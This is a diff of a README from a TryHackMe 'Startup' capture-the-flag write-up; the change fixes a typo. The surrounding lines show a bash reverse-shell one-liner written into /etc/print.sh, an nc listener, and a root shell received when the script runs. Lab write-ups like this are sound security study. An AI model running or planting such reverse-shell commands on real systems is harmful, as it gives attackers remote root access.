Diego-Mancino/Cybersecurity-Writeups/TryHackMe/Startup/README.md

 echo 'bash -i >& /dev/tcp/10.129.122.137/4445 0>&1' > /etc/print.sh
 ```

-A listener was then started on the attacker machin:
+A listener was then started on the attacker machine:

 ```bash
 nc -lvnp 4445
 ```

 Once the script was executed automatically by the system, a reverse shell was received with root privileges.

 ![root](images/root.png)